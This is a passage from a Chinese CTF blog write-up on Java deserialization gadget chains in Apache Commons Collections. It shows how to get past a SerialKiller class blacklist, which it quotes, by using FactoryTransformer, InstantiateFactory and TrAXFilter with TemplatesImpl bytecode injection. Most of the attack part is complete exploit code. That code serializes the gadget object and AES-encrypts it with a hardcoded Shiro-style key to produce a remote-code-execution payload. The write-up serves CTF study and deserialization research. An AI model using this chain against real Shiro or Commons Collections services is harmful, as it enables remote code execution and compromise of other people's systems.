field.set(lazyMap,instantiateTransformer);<br><br>        ByteArrayOutputStream barr = <span class="hljs-keyword">new</span> ByteArrayOutputStream();<br>        ObjectOutputStream oos = <span class="hljs-keyword">new</span> ObjectOutputStream(barr);<br>        oos.writeObject(expMap);<br>        oos.close();<br><br><br><span class="hljs-comment">//        ByteArrayInputStream in = new ByteArrayInputStream(barr.toByteArray());</span><br><span class="hljs-comment">//        ObjectInputStream objectInputStream = new ObjectInputStream(in);</span><br><span class="hljs-comment">//        objectInputStream.readObject();</span><br><span class="hljs-comment">//        objectInputStream.close();</span><br><br>        <span class="hljs-keyword">byte</span>[] payloads = barr.toByteArray();<br>        AesCipherService aes = <span class="hljs-keyword">new</span> AesCipherService();<br>        <span class="hljs-keyword">byte</span>[] key = java.util.Base64.getDecoder().decode(<span class="hljs-string">&quot;7Bhs26ccN6i/0AT9GhZULF==&quot;</span>);<br>        ByteSource ciphertext = aes.encrypt(payloads, key);<br>        System.out.printf(ciphertext.toString());<br><br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">Base64Encode</span><span class="hljs-params">(ByteArrayOutputStream bs)</span></span>&#123;<br>        <span class="hljs-keyword">byte</span>[] encode = Base64.getEncoder().encode(bs.toByteArray());<br>        String s = <span class="hljs-keyword">new</span> String(encode);<br>        System.out.println(s);<br>        System.out.println(s.length());<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span>  <span class="hljs-keyword">void</span> <span class="hljs-title">setFieldValue</span><span class="hljs-params">(Object obj,String key, Object value)</span> <span class="hljs-keyword">throws</span> NoSuchFieldException, IllegalAccessException </span>&#123;<br>        Field field = obj.getClass().getDeclaredField(key);<br>        field.setAccessible(<span class="hljs-keyword">true</span>);<br>        field.set(obj,value);<br>    &#125;<br>&#125;<br><br></code></pre></div></td></tr></table></figure>

<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20220524124142763.png" srcset="/img/loading.gif" lazyload alt="image-20220524124142763"></p>
<h2 id="思路三（接一二）"><a href="#思路三（接一二）" class="headerlink" title="思路三（接一二）"></a>思路三（接一二）</h2><p>改造CC3，原本的cc3调用链如图。这里我们能够很显然想到将<code>ChainedTransformer</code>和<code>ConstatTransformer</code>这两个无关的类直接去掉不就行了。由于JDK8版本改写了AnnotationInvocationHandler类的readobject方法，所以使用<code>AnnotationInvocationHandler</code>这个类还是不可行。其实这里其实就回归到了思路一的问题了，这里是java8的版本。然后最终也也就回到了上面两个思路上，因为前两个思路其实都是在这条链上对于前半部分的处理不同。</p>
<p><img src="C:\Users\86130\AppData\Roaming\Typora\typora-user-images\image-20220524003152646.png" srcset="/img/loading.gif" lazyload alt="image-20220524003152646"></p>
<p><img src="https://img-blog.csdnimg.cn/a5c3fcbc29d7499a9abf6f4d330d4369.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h2 id="思路四（寻找CC链之外的类）"><a href="#思路四（寻找CC链之外的类）" class="headerlink" title="思路四（寻找CC链之外的类）"></a>思路四（寻找CC链之外的类）</h2><p>寻找CC链之外的类，这个就比较进阶了，需要自己找链子。对于本菜鸡来讲还触摸不到，但是由于看了前段时间MRCTF一些大佬的wp发现可以直接利用。</p>
<p>这里用的是<code>Y4tacker</code>大佬的链子也能直接打。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/Y4tacker/CTFBackup/tree/main/2022/2022MRCTF">https://github.com/Y4tacker/CTFBackup/tree/main/2022/2022MRCTF</a></p>
<p>因为MRCTF那道题的过滤非常严格，基本上把能用的CC链的类都给ban掉了，具体可见</p>
<figure class="highlight"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">&lt;blacklist&gt;<br>&lt;!-- ysoserial<span class="hljs-string">&#x27;s CommonsCollections1,3,5,6 payload --&gt;</span><br><span class="hljs-string">&lt;regexp&gt;org\.apache\.commons\.collections\.Transformer$&lt;/regexp&gt; &lt;regexp&gt;org\.apache\.commons\.collections\.functors\.InvokerTransformer$&lt;/regexp&gt; &lt;regexp&gt;org\.apache\.commons\.collections\.functors\.ChainedTransformer$&lt;/regexp&gt; &lt;regexp&gt;org\.apache\.commons\.collections\.functors\.ConstantTransformer$&lt;/regexp&gt; &lt;regexp&gt;org\.apache\.commons\.collections\.functors\.InstantiateTransformer$&lt;/regexp&gt;</span><br><span class="hljs-string">&lt;!-- ysoserial&#x27;</span>s CommonsCollections2,<span class="hljs-number">4</span> payload --&gt;<br>&lt;regexp&gt;org\.apache\.commons\.collections4\.functors\.InvokerTransformer$&lt;/regexp&gt; &lt;regexp&gt;org\.apache\.commons\.collections4\.functors\.ChainedTransformer$&lt;/regexp&gt; &lt;regexp&gt;org\.apache\.commons\.collections4\.functors\.ConstantTransformer$&lt;/regexp&gt; &lt;regexp&gt;org\.apache\.commons\.collections4\.functors\.InstantiateTransformer$&lt;/regexp&gt; &lt;regexp&gt;org\.apache\.commons\.collections4\.comparators\.TransformingComparator$&lt;/regexp&gt;<br>&lt;/blacklist&gt;<br></code></pre></div></td></tr></table></figure>

<p>所以这里需要找到另外的类来替换，不过那题其实预期解是<code>aspectJweaver任意写fat jar 触发rce</code>。这里根据大佬解法提到了三个类</p>
<h3 id="FactoryTransformer"><a href="#FactoryTransformer" class="headerlink" title="FactoryTransformer"></a>FactoryTransformer</h3><p>这个类的内容很简单，<code>transform</code>方法可以调用Factory子类的<code>create()</code>方法</p>
<p><img src="https://img-blog.csdnimg.cn/bd50dc67cf0c43a69e9812130001dd5e.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h3 id="ConstantFactory"><a href="#ConstantFactory" class="headerlink" title="ConstantFactory"></a>ConstantFactory</h3><p>这个类可以返回任意类，可替换<code>ConstantTransformer</code>。不过这里其实用不上这个</p>
<p><img src="https://img-blog.csdnimg.cn/2a64c70134e24c15bc088b82d09a79b9.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h3 id="InstantiateFactory"><a href="#InstantiateFactory" class="headerlink" title="InstantiateFactory"></a>InstantiateFactory</h3><p>这个类里就有<code>create()</code>方法，并且可以实例化任意类，是不是发现和<code>InstantiateTransformer</code>很相似。</p>
<p><img src="https://img-blog.csdnimg.cn/1d71f2ddc1c442dfb1041de0ea5ff825.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h3 id="调用链"><a href="#调用链" class="headerlink" title="调用链"></a>调用链</h3><p>后半部分就可以拼接<code>TrAXFilter</code>和<code>TemplatesImpl</code>那一部分来执行恶意代码。具体整理调用链如下</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java">readObject()<br>-&gt;java.util.HashMap.put()<br>-&gt;java.util.HashMap.hash()<br>-&gt;org.apache.commons.collections.keyvalue.TiedMapEntry.hashcode()<br>-&gt;org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()<br>-&gt;org.apache.commons.collections.map.LazyMap.get()<br>-&gt;org.apache.commons.collections.functors.FactoryTransformer.transform()<br>-&gt;org.apache.commons.collections.functors.InstantiateFactory-&gt;create()<br>-&gt;com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter.TrAXFilter()<br>-&gt;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer()<br></code></pre></div></td></tr></table></figure>

<p>最终exp</p>
<figure class="highlight java"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs java"><span class="hljs-keyword">package</span> ezcc.exp;<br><br><span class="hljs-keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<br><span class="hljs-keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<br><span class="hljs-keyword">import</span> javassist.ClassPool;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.FactoryTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.InstantiateFactory;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.keyvalue.TiedMapEntry;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.LazyMap;<br><span class="hljs-keyword">import</span> org.apache.shiro.crypto.AesCipherService;<br><span class="hljs-keyword">import</span> org.apache.shiro.util.ByteSource;<br><span class="hljs-keyword">import</span> org.nibblesec.tools.SerialKiller;<br><span class="hljs-keyword">import</span> java.io.ByteArrayInputStream;<br><span class="hljs-keyword">import</span> java.io.ByteArrayOutputStream;<br><span class="hljs-keyword">import</span> java.io.ObjectInputStream;<br><span class="hljs-keyword">import</span> java.io.ObjectOutputStream;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.util.Map;<br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test3</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception</span>&#123;<br>        TemplatesImpl obj = <span class="hljs-keyword">new</span> TemplatesImpl();<br>        setFieldValue(obj, <span class="hljs-string">&quot;_bytecodes&quot;</span>, <span class="hljs-keyword">new</span> <span class="hljs-keyword">byte</span>[][]&#123;<br>                ClassPool.getDefault().get(HelloTemplatesImpl.class.getName()).toBytecode( )<br>        &#125;);<br>        setFieldValue(obj, <span class="hljs-string">&quot;_name&quot;</span>, <span class="hljs-string">&quot;1&quot;</span>);<br>        setFieldValue(obj, <span class="hljs-string">&quot;_tfactory&quot;</span>, <span class="hljs-keyword">new</span> TransformerFactoryImpl());<br>        InstantiateFactory instantiateFactory;<br>        instantiateFactory = <span class="hljs-keyword">new</span> InstantiateFactory(com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter.class,<span class="hljs-keyword">new</span> Class[]&#123;javax.xml.transform.Templates.class&#125;,<span class="hljs-keyword">new</span> Object[]&#123;obj&#125;);<br><br>        FactoryTransformer factoryTransformer = <span class="hljs-keyword">new</span> FactoryTransformer(instantiateFactory);<br>        ConstantTransformer constantTransformer = <span class="hljs-keyword">new</span> ConstantTransformer(<span class="hljs-number">1</span>);<br>        Map innerMap = <span class="hljs-keyword">new</span> HashMap();<br>        LazyMap outerMap = (LazyMap)LazyMap.decorate(innerMap, constantTransformer);<br>        TiedMapEntry tme = <span class="hljs-keyword">new</span> TiedMapEntry(outerMap, <span class="hljs-string">&quot;keykey&quot;</span>);<br>        Map expMap = <span class="hljs-keyword">new</span> HashMap();<br>        expMap.put(tme, <span class="hljs-string">&quot;valuevalue&quot;</span>);<br>        setFieldValue(outerMap,<span class="hljs-string">&quot;factory&quot;</span>,factoryTransformer);<br>        outerMap.remove(<span class="hljs-string">&quot;keykey&quot;</span>);<br><br>        ByteArrayOutputStream byteArrayOutputStream = <span class="hljs-keyword">new</span> ByteArrayOutputStream();<br>        ObjectOutputStream objectOutputStream = <span class="hljs-keyword">new</span> ObjectOutputStream(byteArrayOutputStream);<br>        objectOutputStream.writeObject(expMap);<br>        objectOutputStream.close();<br><br>        <span class="hljs-keyword">byte</span>[] payloads = byteArrayOutputStream.toByteArray();<br>        AesCipherService aes = <span class="hljs-keyword">new</span> AesCipherService();<br>        <span class="hljs-keyword">byte</span>[] key = java.util.Base64.getDecoder().decode(<span class="hljs-string">&quot;7Bhs26ccN6i/0AT9GhZULF==&quot;</span>);<br>        ByteSource ciphertext = aes.encrypt(payloads, key);<br>        System.out.printf(ciphertext.toString());<br><br>        ByteArrayInputStream byteArrayInputStream = <span class="hljs-keyword">new</span> ByteArrayInputStream(byteArrayOutputStream.toByteArray());<br>        ObjectInputStream ois = <span class="hljs-keyword">new</span> SerialKiller(byteArrayInputStream, <span class="hljs-string">&quot;F:\\javaweb\\cvdd_ezcc\\src\\main\\resources\\serialkiller.conf&quot;</span>);<br>        ois.readObject();<br>        ois.close();<br><br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">setFieldValue</span><span class="hljs-params">(Object obj, String fieldName, Object value)</span> <span class="hljs-keyword">throws</span> Exception </span>&#123;<br>        Field field = obj.getClass().getDeclaredField(fieldName);<br>        field.setAccessible(<span class="hljs-keyword">true</span>);<br>        field.set(obj, value);<br>    &#125;<br>&#125;<br><br><br></code></pre></div></td></tr></table></figure>


            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/ctf/">ctf</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/ctf/">ctf</a>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/15/2022-3-15-cc3/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">cc3</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/10/2022-3-10xss%E4%B8%AD%E5%85%B3%E4%BA%8Eservice%20worker%E7%9A%84%E4%BD%BF%E7%94%A8/">
                        <span class="hidden-mobile">xss中关于service worker的使用</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->

<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>
<!-- 代码语言 -->
<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>
<!-- 代码块复制 -->
<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>
<script type="text/javascript" src="/libs/codeBlock/clipboard.min.js"></script>
<!-- 代码块收缩 -->
<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script> 
<!-- 代码块折行 -->
<style type="text/css">code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }</style>

    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        京ICP备2022002829号
      </a>
    </span>
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
